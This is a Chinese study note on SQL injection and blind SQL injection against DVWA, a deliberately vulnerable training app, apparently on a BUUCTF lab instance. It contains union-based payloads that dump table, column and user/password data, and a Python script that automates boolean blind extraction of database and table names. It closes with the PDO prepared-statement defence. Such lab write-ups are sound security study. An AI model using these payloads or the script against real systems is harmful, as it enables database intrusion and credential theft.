dvwa中sql注入与盲注
注入:
low:
payload:
查看字段数目
1' order by 2 #
1' order by 3 #
爆库
1' union select 1,database() #
爆表
1' union select 1,GROUP_CONCAT(TABLE_NAME) FROM information_schema.`TABLES` where TABLE_SCHEMA='dvwa' #
爆字段
1' union select 1,GROUP_CONCAT(COLUMN_NAME) FROM information_schema.`COLUMNS` where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'#
爆数据
1' union select user,password from users #
medium:
用bp抓包后很明显是数字注入:将’去了即可
high:
很明显他只会显示一组数据了,使用不存在数据的id再注入即可
impossible:(php中PDO技术,类似于java中的jdbc,先预编译,再传参)
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
//预编译
$data->bindParam( ':id', $id, PDO::PARAM_INT );
//限定了传入参数的类型和传入的参数
$data->execute();
//执行代码
盲注:
low:
- 抄了大佬一个python脚本
import requests,re
#构建head头部
def get_header():
print('imput url')
url = 'http://f2dc4578-0d82-4f44-9728-7dab9ed3a25a.node4.buuoj.cn:81/vulnerabilities/sqli_blind/'
#获取ip,re.search查找字符串,group()即group(0)返回匹配正则表达式整体结果
#构建header,其中如果要传参数进去则在前面加个f在参数部分再加个{}即可
headers = {
'Host' : 'f2dc4578-0d82-4f44-9728-7dab9ed3a25a.node4.buuoj.cn:81',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language' : 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Connection' : 'close',
'Referer' : 'http://f2dc4578-0d82-4f44-9728-7dab9ed3a25a.node4.buuoj.cn:81/vulnerabilities/sqli_blind/',
'Cookie': 'UM_distinctid=17d95c1130a584-0dc5f2065052a48-4c3e217e-144000-17d95c1130b7dc;security=low; PHPSESSID=8mepl10iji29942ldjko3ljep7',
'Upgrade-Insecure-Requests':'1'
}
return headers,url
#爆库的长度
def db_length(url,headers):
for i in range(1,6):
# 所有payload里的注释#要用url编码表示,因为这是直接添加在url里的
dbLen_payload = '?id=1\' and length(database()) = '+str(i)+' %23&Submit=Submit';
#注意这里是headers=headers
r = requests.get(url+dbLen_payload,headers=headers).text
if 'User ID exists in the database.' in r:
dbLen = i
break
else:
dbLen=0
print('dbLen=',dbLen)
return dbLen
#爆库名
def db_name(dbLen,url,headers):
dbName=''
for i in range(1,dbLen+1):
#遍历ascii码
for j in range(65,123):
#注意:这里payload中第二个参数需要在sql语句中也加入单引号,以后写payload前,现在数据库中写好再往过加吧
dbName_payload = '?id=1\' and substr(database(),'+str(i)+',1)=\''+str(chr(j))+'\' %23&Submit=Submit'
r = requests.get(url+dbName_payload,headers=headers).text
if 'User ID exists in the database.' in r:
print(j)
dbName = dbName + str(chr(j))
break
print(dbName)
return dbName
#爆表总长度
#select 1 and (select length(GROUP_CONCAT(TABLE_NAME,'^')) = 29 FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) #
#注意:子查询一定要加(),因为没加()浪费了我一个小时
#注意:还有就是尽量能用数据库就用数据库,TABLE_SCHEMA=DATABASE(),如果用你查出来的库是不行的,我也不清楚为什么爆库的时候不分大小写,而爆表的时候就分大小写了。。我自己的数据库反正是不分大小写的
def tb_len(dbName,url,headers):
for i in range(10,30):
tbLen_payload = '?id=1\' and (select length(GROUP_CONCAT(TABLE_NAME,\'^\')) = '+str(i)+' FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) %23&Submit=Submit'
r=requests.get(url+tbLen_payload,headers=headers).text
if 'User ID exists in the database.' in r:
tbLen = i
break
else:
tbLen=-1
print(tbLen)
return tbLen
#爆表名
#select 1 and (select substr(GROUP_CONCAT(TABLE_NAME,'^'),i,1)='b' FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) #
def tb_name(tbLen,url,headers):
tbName=''
for i in range(1,tbLen+1):
for j in range(65,123):
tbName_payload = '?id=1\' and (select substr(GROUP_CONCAT(TABLE_NAME,\'^\'),'+str(i)+',1)=\''+str(chr(j))+'\' FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) %23&Submit=Submit'
r = requests.get(url+tbName_payload,headers=headers).text
if 'User ID exists in the database.' in r:
tbName = tbName + str(chr(j))
break
print(tbName)
return tbName
if __name__ == '__main__':
headers,url = get_header()
dbLen = db_length(url,headers)
dbName = db_name(dbLen,url,headers)
tbLen = tb_len(dbName,url,headers)
tbName = tb_name(tbLen,url,headers)
- 两位大佬blog:
https://blog.csdn.net/qq_42785117/article/details/100310559
https://blog.csdn.net/qq_42181428/article/details/88075784
medium
medium不会python脚本,主要是它不仅用了post,他传输文件用的还不是json,但是用bp抓包后可以直接暴力破解
high
high模式下,发现还是post,但他中途进行了跳转,bp第二个包的cookie是第一个包传的参数的url编码,所以我们直接使用bp暴力破解即可模式即可
暴力破解
暴力破解书写payload时一位一位爆破,不然会无限重复
impossible
和sql注入的impossible一样,都是采用了PDO技术,很安全